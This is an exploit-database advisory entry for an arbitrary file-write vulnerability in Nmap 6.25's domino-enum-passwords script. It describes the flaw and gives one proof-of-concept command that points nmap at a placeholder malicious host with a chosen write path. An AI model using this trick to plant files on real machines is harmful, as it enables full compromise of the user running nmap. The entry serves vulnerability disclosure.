Nmap - Arbitrary File Write

2013-08-06T00:00:00
ID EXPLOITPACK:C5D81324B431D9088BB21B7CDA7D31BB
Type exploitpack
Reporter Piotr Duszynski
Modified 2013-08-06T00:00:00

Description

Nmap - Arbitrary File Write

                                        
                                            source: https://www.securityfocus.com/bid/62024/info

Nmap is prone to an arbitrary file-write vulnerability.

An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.

Nmap 6.25 is vulnerable; other versions may also be affected. 

nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'